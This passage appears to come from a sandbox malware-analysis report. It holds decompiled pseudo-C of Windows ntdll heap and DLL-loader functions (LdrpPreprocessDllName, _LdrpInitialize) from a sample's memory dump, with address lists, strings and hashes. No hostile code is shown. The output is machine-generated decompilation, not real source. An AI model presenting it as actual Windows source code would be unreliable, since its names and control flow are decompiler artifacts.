						E328A0B10(__ecx, _t509, _t439);
						_t502 =  *(_t547 + 0x248);
						_t545 =  *((intOrPtr*)(_t547 + 0x1f8)) - ( *(_t547 + 0x74) << 3);
						_t242 = _t502 >> 4;
						if(_t545 < _t502 - _t242) {
							_t504 =  *(_t547 + 0x24c);
							_t242 = _t504 >> 2;
							__eflags = _t545 - _t504 - _t242;
							if(_t545 > _t504 - _t242) {
								_t242 = E3288F6C1(_t547);
								 *(_t547 + 0x24c) = _t545;
								 *(_t547 + 0x248) = _t545;
							}
						}
						goto L7;
					}
				}
			}

0x3288f113
0x3288f120
0x3288f123
0x3288f127
0x3288f137
0x3288f13b
0x328edc64
0x328edc67
0x3288f1d5
0x3288f1d5
0x3288f1c7
0x3288f1cd
0x3288f1cd
0x3288f144
0x328edc75
0x328edc79
0x328edc7b
0x328edc8d
0x328edc92
0x328edc94
0x328edc9a
0x328edc9a
0x328edc9a
0x328edc9a
0x328edc94
0x328edca0
0x328edca3
0x328edca5
0x3288f202
0x3288f202
0x3288f205
0x3288f207
0x328edcae
0x3288f20d
0x3288f21b
0x3288f21b
0x3288f21b
0x3288f228
0x3288f22a
0x3288f22e
0x3288f231
0x3288f23f
0x3288f243
0x3288f248
0x3288f24f
0x3288f256
0x3288f259
0x3288f263
0x3288f269
0x3288f26f
0x3288f275
0x3288f278
0x3288f27d
0x3288f45b
0x3288f461
0x3288f461
0x3288f283
0x3288f28d
0x3288f291
0x3288f292
0x3288f295
0x3288f3be
0x3288f3be
0x3288f3be
0x3288f29d
0x3288f2a1
0x3288f494
0x3288f498
0x3288f49d
0x3288f4a1
0x3288f4a5
0x328edcb5
0x328edcb7
0x00000000
0x00000000
0x328edcbd
0x3288f4ab
0x3288f4b2
0x328edcc2
0x328edcc4
0x328edcca
0x328edcd0
0x328edcd4
0x328edcf3
0x328edcf8
0x328edcd6
0x328edceb
0x328edcf0
0x328edcfe
0x328edd03
0x328edd08
0x328edd10
0x328edd12
0x328edd17
0x328edd17
0x328edd1c
0x328edd20
0x328edd20
0x328edcc4
0x3288f4b8
0x3288f4be
0x3288f4c1
0x3288f4c5
0x3288f4c7
0x3288f4cb
0x3288f4cd
0x328edd28
0x328edd28
0x3288f4d9
0x3288f4d9
0x3288f4dd
0x3288f4e1
0x328edd30
0x328edd37
0x00000000
0x00000000
0x328edd3d
0x328ee0fe
0x328ee0fe
0x00000000
0x00000000
0x328ee104
0x328ee10a
0x328ee10e
0x328ee12d
0x328ee132
0x328ee110
0x328ee125
0x328ee12a
0x328ee138
0x328ee13d
0x328ee142
0x328ee14a
0x328ee14c
0x328ee151
0x328ee151
0x00000000
0x3288f4e7
0x3288f4f5
0x3288f4fa
0x3288f4fc
0x328edd44
0x328edd44
0x328edd4a
0x328edd4f
0x328ee159
0x328ee159
0x3288f1d2
0x3288f1d2
0x3288f1d4
0x3288f1d4
0x00000000
0x3288f1d4
0x328edd6d
0x328ee156
0x328ee156
0x00000000
0x328ee156
0x3288f502
0x3288f507
0x3288f50c
0x3288f50e
0x328edd80
0x3288f514
0x3288f514
0x3288f514
0x3288f516
0x3288f519
0x328edd8a
0x328edd90
0x328edd97
0x328edda9
0x328edda9
0x328edd97
0x3288f51f
0x3288f523
0x3288f529
0x3288f52c
0x3288f532
0x328eddb3
0x328eddb3
0x3288f53c
0x3288f541
0x3288f54b
0x3288f550
0x3288f55c
0x3288f563
0x3288f56d
0x3288f570
0x3288f575
0x3288f577
0x3288f577
0x3288f577
0x3288f577
0x3288f57d
0x3288f582
0x328eddc2
0x328eddca
0x328eddce
0x328eddda
0x328eddde
0x328edeaf
0x328edeb3
0x328edec1
0x328edec7
0x328edec7
0x328edde4
0x328edde8
0x328eddea
0x328edded
0x328eddf7
0x328eddfa
0x328eddfc
0x328ede02
0x328ede08
0x328ede0a
0x328ede0d
0x328ede0f
0x328ede15
0x328ede18
0x328ede37
0x328ede3c
0x328ede1a
0x328ede2f
0x328ede34
0x328ede42
0x328ede47
0x328ede4d
0x328ede53
0x328ede55
0x328ede5a
0x328ede5a
0x328ede5f
0x328ede5f
0x328ede0d
0x328ede63
0x328ede66
0x328ede69
0x328ede72
0x328ede73
0x328ede77
0x328ede7c
0x328ede7e
0x328ede7f
0x328ede80
0x328ede81
0x328ede87
0x328ede88
0x328ede8d
0x328ede91
0x328ede91
0x328ede95
0x328ede95
0x328ede9d
0x328edea0
0x328edea5
0x328edea5
0x328eddde
0x3288f588
0x3288f58d
0x3288f58f
0x328eded7
0x3288f595
0x3288f595
0x3288f595
0x3288f597
0x3288f59a
0x328edee1
0x328edeea
0x328edef0
0x328edefb
0x328edefd
0x328edf08
0x328edf08
0x328edf08
0x328edf2b
0x328edf2b
0x328edef0
0x3288f5a0
0x3288f5a5
0x3288f5aa
0x3288f5af
0x3288f5b1
0x328edf3e
0x3288f5b7
0x3288f5b7
0x3288f5b7
0x3288f5b9
0x3288f5bc
0x328edf4a
0x328edf4c
0x328edf57
0x328edf57
0x328edf57
0x328edf5c
0x328edf5d
0x328edf61
0x328edf7c
0x328edf88
0x328edf89
0x328edf8d
0x328edf8d
0x00000000
0x3288f5bc
0x3288f4e1
0x3288f2a7
0x3288f2ad
0x3288f2b6
0x3288f2ba
0x3288f2bc
0x328edf97
0x328edf9d
0x328edf9d
0x3288f2c4
0x3288f2c7
0x3288f2cb
0x3288f2cd
0x3288f2d2
0x3288f2d6
0x3288f3c8
0x3288f3c8
0x3288f2dc
0x3288f2e1
0x3288f2e3
0x328ee0ed
0x328ee0f3
0x00000000
0x00000000
0x328ee0f9
0x00000000
0x328ee0f9
0x3288f2e9
0x3288f2eb
0x3288f2ef
0x3288f2f3
0x3288f302
0x3288f302
0x3288f304
0x3288f346
0x3288f346
0x3288f348
0x3288f34c
0x3288f3ea
0x3288f3f2
0x3288f3f6
0x3288f402
0x3288f406
0x328ee046
0x328ee049
0x328ee057
0x328ee05d
0x328ee05d
0x3288f40c
0x3288f410
0x3288f413
0x3288f423
0x3288f426
0x3288f428
0x3288f42e
0x3288f434
0x328edfe4
0x328edfe7
0x328edfed
0x328edff3
0x328edff6
0x328ee015
0x328ee01a
0x328edff8
0x328ee00d
0x328ee012
0x328ee020
0x328ee025
0x328ee02b
0x328ee031
0x328ee033
0x328ee038
0x328ee038
0x328ee03d
0x328ee03d
0x328edfe7
0x3288f43a
0x3288f43d
0x3288f440
0x3288f442
0x3288f470
0x3288f471
0x3288f475
0x3288f47a
0x3288f47c
0x3288f47d
0x3288f47e
0x3288f47f
0x3288f482
0x3288f483
0x3288f488
0x3288f48c
0x3288f48c
0x3288f444
0x3288f444
0x3288f444
0x3288f446
0x3288f451
0x3288f451
0x3288f406
0x3288f36b
0x3288f37a
0x3288f37f
0x3288f384
0x3288f389
0x3288f38b
0x328ee06d
0x3288f391
0x3288f391
0x3288f391
0x3288f393
0x3288f396
0x328ee077
0x328ee080
0x328ee086
0x328ee091
0x328ee093
0x328ee09e
0x328ee09e
0x328ee09e
0x328ee0bb
0x328ee0bb
0x328ee086
0x3288f39c
0x3288f3a1
0x3288f3a6
0x3288f3a8
0x328ee0ce
0x3288f3ae
0x3288f3ae
0x3288f3ae
0x3288f3b0
0x3288f3b3
0x00000000
0x3288f3b9
0x328ee0dd
0x328ee0df
0x328edf70
0x328edf70
0x328edf70
0x328edf79
0x328edf7a
0x328edf7b
0x00000000
0x328edf7b
0x3288f3b3
0x3288f306
0x3288f31a
0x3288f31f
0x3288f321
0x00000000
0x00000000
0x3288f327
0x3288f32c
0x3288f32e
0x328edfaf
0x3288f334
0x3288f334
0x3288f334
0x3288f339
0x3288f33c
0x328edfb9
0x328edfc2
0x328edfc8
0x328edfda
0x328edfda
0x328edfc8
0x3288f342
0x00000000
0x3288f342
0x3288f2f9
0x3288f2fc
0x3288f3d0
0x3288f3d2
0x00000000
0x00000000
0x3288f3d8
0x3288f3db
0x00000000
0x3288f3e1
0x00000000
0x3288f3e1
0x3288f3db
0x00000000
0x3288f2fc
0x3288f14a
0x3288f150
0x328edc6e
0x00000000
0x328edc6e
0x3288f159
0x3288f15b
0x3288f162
0x3288f1d0
0x00000000
0x3288f17b
0x3288f184
0x3288f189
0x3288f18c
0x3288f18e
0x3288f19e
0x00000000
0x3288f1a0
0x3288f1a3
0x3288f1b1
0x3288f1ba
0x3288f1be
0x3288f1c5
0x3288f1dc
0x3288f1e4
0x3288f1e9
0x3288f1eb
0x3288f1ef
0x3288f1f4
0x3288f1fa
0x3288f1fa
0x3288f1eb
0x00000000
0x3288f1c5
0x3288f19e

Strings

HEAP[%wZ]: , xrefs: 328EDCE6, 328EDE2A, 328EE008, 328EE120
(!TrailingUCR), xrefs: 328EE138
((LONG)FreeEntry->Size > 1), xrefs: 328EDE42
(UCRBlock != NULL), xrefs: 328EDCFE
(LONG)FreeEntry->Size > 1, xrefs: 328EE020
HEAP: , xrefs: 328EDCF3, 328EDE37, 328EE015, 328EE12D

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: ff379a7f423514f72d23f9ce38ee30358ab36d0b389e6489f17cfd57a8e18f41
Instruction ID: da07481a5ed96605451e583f4a81bd7cd5c55609f64778a1bd32a646e8c76d46
Opcode Fuzzy Hash: ff379a7f423514f72d23f9ce38ee30358ab36d0b389e6489f17cfd57a8e18f41
Instruction Fuzzy Hash: 3342F17D2083819FE305CF28C884B2ABBE5FF99348F444969E89ACB351DB74D945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 328AB0D0 Relevance: 7.8, Strings: 6, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E328AB0D0(signed short* __ecx, signed short* __edx, signed int _a4, signed int* _a8) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed short* _v12;
				char _v16;
				signed int _v20;
				char _v28;
				char _v36;
				char _v44;
				signed int _t75;
				char* _t76;
				signed int _t79;
				signed short* _t81;
				signed short* _t89;
				short* _t93;
				signed short* _t96;
				signed int _t97;
				signed int _t103;
				signed int _t112;
				void* _t119;
				char _t128;
				signed int _t134;
				signed short* _t135;
				signed int _t136;
				signed int* _t138;
				signed int _t140;
				signed short _t141;
				void* _t144;
				signed short _t145;
				signed int _t146;
				signed int _t151;
				signed short* _t161;
				signed short _t165;
				signed short _t168;
				signed short* _t183;
				signed int _t184;
				signed int _t186;
				void* _t189;

				_t135 = __ecx;
				_t183 = __edx;
				_v12 = __ecx;
				if(E328AC4A0(0,  &_v16) < 0) {
					_v8 = 0;
				} else {
					_v8 = 1;
				}
				_t138 = _a8;
				_t75 = 0;
				_t184 = 0;
				_v5 = 0;
				if(( *_t138 & 0x00800008) != 0) {
					L16:
					_v12 = _t135;
					if( *_t183 != 0) {
						__eflags =  *0x329837c0 & 0x00000005;
						if(( *0x329837c0 & 0x00000005) != 0) {
							__eflags = _t75;
							_t76 = "SxS";
							if(_t75 == 0) {
								_t76 = "API set";
							}
							_push(_t76);
							_push(_t183);
							E3290E692("minkernel\\ntdll\\ldrutil.c", 0xa78, "LdrpPreprocessDllName", 2, "DLL %wZ was redirected to %wZ by %s\n", _t135);
							_t138 = _a8;
							_t189 = _t189 + 0x20;
						}
						_t79 =  *_t138 | 0x00000200;
						__eflags = _v5;
						 *_t138 = _t79;
						if(_v5 != 0) {
							 *_t138 = _t79 | 0x00000004;
						}
						_t81 = _t183;
						_v12 = _t81;
						L27:
						if(_t184 < 0) {
							goto L83;
						}
						if(( *_t138 & 0x00000200) != 0) {
							L3289FCF0(_t138, _t183);
							_t81 = _v12;
						}
						_t165 = _t81[2];
						_t89 = ( *_t81 & 0x0000ffff) + 0xfffffffe + _t165;
						if(_t89 < _t165) {
							L34:
							_t184 = E328AC7E7(_t183, 0x3286116c);
							goto L39;
						} else {
							while(1) {
								_t140 =  *_t89 & 0x0000ffff;
								if(_t140 == 0x2e) {
									break;
								}
								if(_t140 != 0x2f && _t140 != 0x5c) {
									_t89 = _t89 - 2;
									if(_t89 >= _t165) {
										continue;
									}
								}
								goto L34;
							}
							_t141 = _t183[2];
							_t93 = ( *_t183 & 0x0000ffff) + 0xfffffffe + _t141;
							__eflags = _t93 - _t141;
							if(_t93 < _t141) {
								L38:
								__eflags = 0;
								 *((short*)(_t93 + 2)) = 0;
								L39:
								if(_t184 < 0) {
									goto L83;
								}
								goto L40;
							}
							while(1) {
								__eflags =  *_t93 - 0x2e;
								if( *_t93 != 0x2e) {
									goto L38;
								}
								_t93 = _t93 - 2;
								 *_t183 =  *_t183 + 0xfffe;
								__eflags = _t93 - _t141;
								if(_t93 >= _t141) {
									continue;
								}
								goto L38;
							}
							goto L38;
						}
					}
					_t168 = _t135[2];
					_t96 = ( *_t135 & 0x0000ffff) + 0xfffffffe + _t168;
					if(_t96 < _t168) {
						L22:
						 *_t138 =  *_t138 | 0x00000020;
						_t184 = 0;
						_t97 =  *_t135 & 0x0000ffff;
						if(_t97 == 0) {
							L26:
							_t81 = _t135;
							goto L27;
						}
						_t144 = _t97 + ( *_t183 & 0x0000ffff) + 2;
						if(_t144 > (_t183[1] & 0x0000ffff)) {
							__eflags = _t144 - 0xfffe;
							if(_t144 <= 0xfffe) {
								_t62 = _t144 + 0x3f; // -191
								_t186 = _t62 & 0xffffffc0;
								__eflags = _t186 - 0xfffe;
								if(_t186 > 0xfffe) {
									_t186 = 0xfffe;
								}
								_t145 = _t183[2];
								_t64 =  &(_t183[4]); // 0x1000008
								__eflags = _t145 - _t64;
								if(_t145 == _t64) {
									_t146 = L328A5D60(_t186);
									_v20 = _t146;
									__eflags = _t146;
									if(_t146 == 0) {
										goto L80;
									}
									_t103 =  *_t183 & 0x0000ffff;
									__eflags = _t103;
									if(_t103 != 0) {
										E328D88C0(_t146, _t183[2], _t103);
										_t146 = _v20;
										_t189 = _t189 + 0xc;
									}
									goto L78;
								} else {
									_t146 = L32913C57(_t186, _t145);
									L78:
									__eflags = _t146;
									if(_t146 == 0) {
										L80:
										_t184 = 0xc0000017;
										L25:
										_t138 = _a8;
										goto L26;
									}
									_t183[2] = _t146;
									_t183[1] = _t186;
									goto L24;
								}
							}
							_t184 = 0xc0000106;
							goto L25;
						}
						L24:
						_t184 = 0;
						E328D88C0(( *_t183 & 0x0000ffff) + _t183[2], _t135[2],  *_t135 & 0x0000ffff);
						_t189 = _t189 + 0xc;
						 *_t183 =  *_t183 + ( *_t135 & 0x0000ffff);
						 *((short*)(_t183[2] + (( *_t183 & 0x0000ffff) >> 1) * 2)) = 0;
						goto L25;
					} else {
						goto L18;
					}
					while(1) {
						L18:
						_t151 =  *_t96 & 0x0000ffff;
						if(_t151 == 0x5c || _t151 == 0x2f) {
							break;
						}
						_t96 = _t96 - 2;
						if(_t96 >= _t168) {
							continue;
						}
						_t138 = _a8;
						goto L22;
					}
					__eflags = E328C432E(_t135) - 5;
					if(__eflags == 0) {
						_t184 = E328AC7E7(_t183, _t135);
						goto L25;
					}
					_t112 = E328B23C4(_t135, _t183, __eflags);
					_t138 = _a8;
					_t184 = _t112;
					_t81 = _t135;
					__eflags = _t184;
					if(_t184 < 0) {
						goto L83;
					}
					 *_t138 =  *_t138 | 0x00000600;
					goto L27;
				} else {
					_v5 = 0;
					_v20 =  *[fs:0x30];
					_v7 = 1;
					L328ADF36(0, _t135, 0x14d0);
					asm("sbb edx, edx");
					if(E328B015C( *((intOrPtr*)( *[fs:0x30] + 0x38)), _t135,  ~_a4 & _a4 + 0x0000002c,  &_v6,  &_v28) < 0 || _v6 == 0) {
						_t119 = 0x14d3;
					} else {
						__eflags = _v28;
						if(_v28 == 0) {
							_t119 = 0x14d2;
						} else {
							_t119 = 0x14d1;
						}
					}
					L328ADF36(0, _t135, _t119);
					if(_v6 != 0) {
						__eflags = _v28;
						if(_v28 == 0) {
							_t184 = 0xc0000481;
							goto L14;
						}
						 *_t183 = 0;
						E328D5050(0,  &_v44, E328A01C0());
						E328AC7E7(_t183,  &_v44);
						E328AC7E7(_t183, 0x32861008);
						_t184 = E328AC7E7(_t183,  &_v28);
						__eflags = _t184;
						if(_t184 < 0) {
							goto L7;
						}
						_t134 =  *(_v20 + 0x10);
						__eflags = _t134;
						if(_t134 == 0) {
							L53:
							_t128 = 0;
							__eflags = 0;
							L54:
							_t161 = _t183;
							goto L8;
						}
						__eflags =  *(_t134 + 8) & 0x00001000;
						if(( *(_t134 + 8) & 0x00001000) != 0) {
							_t128 = 1;
							goto L54;
						}
						goto L53;
					} else {
						L7:
						_t128 = _v7;
						_t161 = _t135;
						L8:
						if(_t184 < 0) {
							L83:
							__eflags =  *0x329837c0 & 0x00000003;
							if(( *0x329837c0 & 0x00000003) != 0) {
								_push(_t184);
								E3290E692("minkernel\\ntdll\\ldrutil.c", 0xab2, "LdrpPreprocessDllName", 0, "LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx\n", _t135);
							}
							__eflags =  *0x329837c0 & 0x00000010;
							if(( *0x329837c0 & 0x00000010) != 0) {
								asm("int3");
							}
							L40:
							if(_v8 != 0) {
								E328AC4A0(_v16,  &_v16);
							}
							return _t184;
						} else {
							if(_t128 != 0 &&  *0x32985d70 == 0) {
								_t136 = E328A9870(1, _t161, 0x3286116c, 0,  &_v36, 0, 0, 0, 0);
								if(_t136 >= 0) {
									_v5 = 1;
									E328B23C4( &_v36, _t183, __eflags);
									E328BE3C9( &_v36);
								}
								if(_t136 != 0xc0150008) {
									_t184 = _t136;
								}
								_t135 = _v12;
							}
							L14:
							if(_t184 < 0) {
								goto L83;
							} else {
								_t138 = _a8;
								_t75 = _v5;
								goto L16;
							}
						}
					}
				}
			}

0x328ab0de
0x328ab0e3
0x328ab0e5
0x328ab0ef
0x328f81db
0x328ab0f5
0x328ab0f5
0x328ab0f5
0x328ab0f9
0x328ab0fc
0x328ab0fe
0x328ab100
0x328ab109
0x328ab1d5
0x328ab1d9
0x328ab1dc
0x328ab303
0x328ab30a
0x328f81f8
0x328f81fa
0x328f81ff
0x328f8201
0x328f8201
0x328f8206
0x328f8207
0x328f821f
0x328f8224
0x328f8227
0x328f8227
0x328ab312
0x328ab317
0x328ab31b
0x328ab31d
0x328ab3ff
0x328ab3ff
0x328ab323
0x328ab325
0x328ab264
0x328ab266
0x00000000
0x00000000
0x328ab272
0x328ab2f6
0x328ab2fb
0x328ab2fb
0x328ab278
0x328ab281
0x328ab285
0x328ab2a0
0x328ab2ac
0x00000000
0x328ab287
0x328ab287
0x328ab287
0x328ab28d
0x00000000
0x00000000
0x328ab292
0x328ab299
0x328ab29e
0x00000000
0x00000000
0x328ab29e
0x00000000
0x328ab292
0x328ab2b3
0x328ab2b9
0x328ab2bb
0x328ab2bd
0x328ab2ca
0x328ab2ca
0x328ab2cc
0x328ab2d0
0x328ab2d2
0x00000000
0x00000000
0x00000000
0x328ab2d2
0x328ab2c0
0x328ab2c0
0x328ab2c4
0x00000000
0x00000000
0x328f82bf
0x328f82c2
0x328f82c5
0x328f82c7
0x00000000
0x00000000
0x00000000
0x328f82cd
0x00000000
0x328ab2c0
0x328ab285
0x328ab1e5
0x328ab1eb
0x328ab1ef
0x328ab210
0x328ab210
0x328ab213
0x328ab215
0x328ab21b
0x328ab262
0x328ab262
0x00000000
0x328ab262
0x328ab225
0x328ab22d
0x328f823f
0x328f8245
0x328f8251
0x328f8254
0x328f8257
0x328f825d
0x328f825f
0x328f825f
0x328f8264
0x328f8267
0x328f826a
0x328f826c
0x328f827f
0x328f8281
0x328f8284
0x328f8286
0x00000000
0x00000000
0x328f8288
0x328f828b
0x328f828e
0x328f8295
0x328f829a
0x328f829d
0x328f829d
0x00000000
0x328f826e
0x328f8275
0x328f82a0
0x328f82a0
0x328f82a2
0x328f82b0
0x328f82b0
0x328ab25f
0x328ab25f
0x00000000
0x328ab25f
0x328f82a4
0x328f82a7
0x00000000
0x328f82a7
0x328f826c
0x328f8247
0x00000000
0x328f8247
0x328ab233
0x328ab236
0x328ab243
0x328ab24b
0x328ab24e
0x328ab25b
0x00000000
0x00000000
0x00000000
0x00000000
0x328ab1f1
0x328ab1f1
0x328ab1f1
0x328ab1f7
0x00000000
0x00000000
0x328ab206
0x328ab20b
0x00000000
0x00000000
0x328ab20d
0x00000000
0x328ab20d
0x328ab3ae
0x328ab3b1
0x328f8238
0x00000000
0x328f8238
0x328ab3bb
0x328ab3c0
0x328ab3c3
0x328ab3c5
0x328ab3c7
0x328ab3c9
0x00000000
0x00000000
0x328ab3cf
0x00000000
0x328ab10f
0x328ab117
0x328ab123
0x328ab129
0x328ab12d
0x328ab144
0x328ab154
0x328ab160
0x328ab32d
0x328ab32d
0x328ab332
0x328f81e4
0x328ab338
0x328ab338
0x328ab338
0x328ab332
0x328ab16a
0x328ab173
0x328ab342
0x328ab347
0x328f81ee
0x00000000
0x328f81ee
0x328ab34f
0x328ab35c
0x328ab366
0x328ab372
0x328ab381
0x328ab383
0x328ab385
0x00000000
0x00000000
0x328ab38e
0x328ab391
0x328ab393
0x328ab39e
0x328ab39e
0x328ab39e
0x328ab3a0
0x328ab3a0
0x00000000
0x328ab3a0
0x328ab395
0x328ab39c
0x328ab406
0x00000000
0x328ab406
0x00000000
0x328ab179
0x328ab179
0x328ab179
0x328ab17c
0x328ab17e
0x328ab180
0x328f82d2
0x328f82d2
0x328f82d9
0x328f82db
0x328f82f3
0x328f82f8
0x328f82fb
0x328f8302
0x328f8308
0x328f8308
0x328ab2d8
0x328ab2dc
0x328ab2e5
0x328ab2e5
0x328ab2f2
0x328ab186
0x328ab188
0x328ab1ae
0x328ab1b2
0x328ab3dc
0x328ab3e3
0x328ab3eb
0x328ab3eb
0x328ab1be
0x328ab3f5
0x328ab3f5
0x328ab1c4
0x328ab1c4
0x328ab1c7
0x328ab1c9
0x00000000
0x328ab1cf
0x328ab1cf
0x328ab1d2
0x00000000
0x328ab1d2
0x328ab1c9
0x328ab180
0x328ab173

Strings

LdrpPreprocessDllName, xrefs: 328F8210, 328F82E4
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 328F82DD
SxS, xrefs: 328F81FA
API set, xrefs: 328F8201, 328F8206
DLL %wZ was redirected to %wZ by %s, xrefs: 328F8209
minkernel\ntdll\ldrutil.c, xrefs: 328F821A, 328F82EE

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: e6183855bcb5832b278e0ff8358451cde99ed67b2e702dd19c6dc385740bdf93
Instruction ID: 872fa6b5657a1148b3d182e62660b9173edc1e10ef0ccd8630896dbdb87087a6
Opcode Fuzzy Hash: e6183855bcb5832b278e0ff8358451cde99ed67b2e702dd19c6dc385740bdf93
Instruction Fuzzy Hash: 6DC1577DA00359AFEB048B6CDCA0BBE77A1AF55308F54816AE9159B290EFB5DC44C390

Uniqueness

Uniqueness Score: -1.00%

Function 328C631F Relevance: 7.8, Strings: 6, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E328C631F(intOrPtr __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _t71;
				void* _t73;
				signed int _t77;
				signed int _t79;
				char* _t84;
				intOrPtr _t85;
				signed int _t86;
				signed int _t88;
				signed char* _t89;
				void* _t99;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				signed char _t109;
				void* _t111;
				intOrPtr _t112;
				intOrPtr _t116;
				intOrPtr _t124;
				intOrPtr _t127;
				signed char _t130;
				signed int _t132;
				signed int _t133;
				intOrPtr _t136;
				void* _t138;
				signed int* _t140;
				signed short _t141;
				signed int _t145;
				void* _t147;
				signed int _t148;
				signed int _t149;
				void* _t151;
				void* _t153;

				_push(__esi);
				_push(__edi);
				_t145 = __edx;
				_t136 = __ecx;
				if( *0x329868d4 == 0) {
					E32911419();
				}
				_t71 =  *[fs:0x18];
				if(( *(_t71 + 0xfca) & 0x00004000) != 0) {
					return _t71;
				} else {
					_t116 = _t136;
					_t132 = _t145;
					_pop(_t138);
					_pop(_t147);
					_push("true");
					_push(0x3296c780);
					E328E7BE4(_t111, _t138, _t147);
					 *(_t151 - 0x28) = _t132;
					 *((intOrPtr*)(_t151 - 0x20)) = _t116;
					_t112 =  *[fs:0x18];
					 *((intOrPtr*)(_t151 - 0x30)) = _t112;
					_t148 = 0;
					 *(_t151 - 0x24) = 0;
					while(1) {
						L6:
						_t133 = 0x2000;
						_t118 = 1;
						_t73 = 0;
						asm("lock cmpxchg [edi], ecx");
						if(0 != 1 || ( *(_t112 + 0xfca) & 0x00002000) != 0) {
							goto L8;
						}
						L44:
						_t104 =  *0x32985d50;
						__eflags = _t104;
						if(_t104 == 0) {
							L51:
							 *((intOrPtr*)(_t151 - 0x40)) = 0xfffb6c20;
							_t55 = _t151 - 0x3c;
							 *_t55 =  *(_t151 - 0x3c) | 0xffffffff;
							__eflags =  *_t55;
							while(1) {
								__eflags =  *0x32985db0 - 1;
								if(__eflags != 0) {
									goto L6;
								}
								_push(_t151 - 0x40);
								_push(_t148);
								_t106 = E328D2CF0();
								__eflags = _t106;
								if(_t106 < 0) {
									_t130 =  *0x329837c0; // 0x0
									__eflags = _t130 & 0x00000003;
									if((_t130 & 0x00000003) != 0) {
										E3290E692("minkernel\\ntdll\\ldrinit.c", 0x615, "_LdrpInitialize", 1, "Delaying execution failed with status 0x%08lx\n", _t106);
										_t153 = _t153 + 0x18;
										_t130 =  *0x329837c0; // 0x0
									}
									__eflags = _t130 & 0x00000040;
									if((_t130 & 0x00000040) != 0) {
										asm("int3");
									}
								}
							}
							continue;
						} else {
							_push(_t148);
							_push(_t148);
							_push(_t104);
							_t108 = E328D29D0();
							_t118 = _t108;
							__eflags = _t108;
							if(__eflags < 0) {
								_t109 =  *0x329837c0; // 0x0
								__eflags = _t109 & 0x00000003;
								if((_t109 & 0x00000003) != 0) {
									E3290E692("minkernel\\ntdll\\ldrinit.c", 0x604, "_LdrpInitialize", 1, "NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop\n", _t118);
									_t153 = _t153 + 0x18;
									_t109 =  *0x329837c0; // 0x0
								}
								__eflags = _t109 & 0x00000040;
								if((_t109 & 0x00000040) != 0) {
									asm("int3");
								}
								goto L51;
							} else {
								_t73 =  *0x32985db0; // 0x2
							}
						}
						L8:
						_t140 =  *(_t112 + 0x30);
						if(_t73 == 0) {
							_push(_t148);
							_push(_t148);
							_push(_t148);
							_push(0x1f0003);
							_push(0x32985d50);
							E328D2E30();
							 *(_t112 + 0xfca) =  *(_t112 + 0xfca) | 0x00000020;
							_t140[0x28] = 0x32983390;
							 *0x329865f4 = _t148;
							 *(_t151 - 0x34) =  &(_t140[0xa]);
							asm("lock bts dword [eax], 0x1");
							_t149 = E32914F99();
							__eflags = _t149;
							if(_t149 >= 0) {
								 *(_t151 - 4) =  *(_t151 - 4) & 0x00000000;
								_t77 = _t140[4];
								 *(_t151 - 0x38) = _t77;
								__eflags =  *(_t77 + 8);
								if(__eflags < 0) {
									 *0x32985d70 = 1;
									 *0x32985d08 = 1;
								}
								_t133 =  *(_t151 - 0x28);
								_t149 = L3290A3F0(_t112,  *((intOrPtr*)(_t151 - 0x20)), _t133, _t140, _t149, __eflags);
								 *(_t151 - 0x1c) = _t149;
								__eflags = _t149;
								if(_t149 < 0) {
									_t79 =  *0x329837c0; // 0x0
									__eflags = _t79 & 0x00000003;
									if((_t79 & 0x00000003) != 0) {
										E3290E692("minkernel\\ntdll\\ldrinit.c", 0x678, "_LdrpInitialize", 0, "Process initialization failed with status 0x%08lx\n", _t149);
										_t79 =  *0x329837c0; // 0x0
									}
									__eflags = _t79 & 0x00000010;
									if((_t79 & 0x00000010) != 0) {
										asm("int3");
									}
									 *(_t151 - 4) = 0xfffffffe;
									goto L14;
								} else {
									__eflags =  *0x329868d0;
									if( *0x329868d0 != 0) {
										 *(_t151 - 4) = 0xfffffffe;
										goto L18;
									} else {
										_t124 =  *0x32985b24; // 0x2552ce0
										_t24 = _t124 + 0x24; // 0x2552d04
										_t133 = _t24;
										_t25 = _t124 + 0x18; // 0x400000
										L328ADF36( *_t25, _t133, 0x14ae);
										_t126 = _t140[0x82];
										__eflags = _t140[0x82];
										if(__eflags != 0) {
											_t149 = E32913BA3(_t112, _t126, _t140, _t149, __eflags);
											 *(_t151 - 0x1c) = _t149;
										}
										 *(_t151 - 4) = 0xfffffffe;
										_t141 = 0x2000;
										 *0x329865f4 = 3;
										asm("lock btr dword [eax], 0x1");
										_t127 =  *0x3298670c; // 0x25532b0
										E328C64BE(_t127);
										__eflags = _t149;
										if(_t149 < 0) {
											goto L67;
										} else {
											_t79 = E328C648A(_t133);
											goto L15;
										}
									}
								}
							} else {
								_t79 =  *0x329837c0; // 0x0
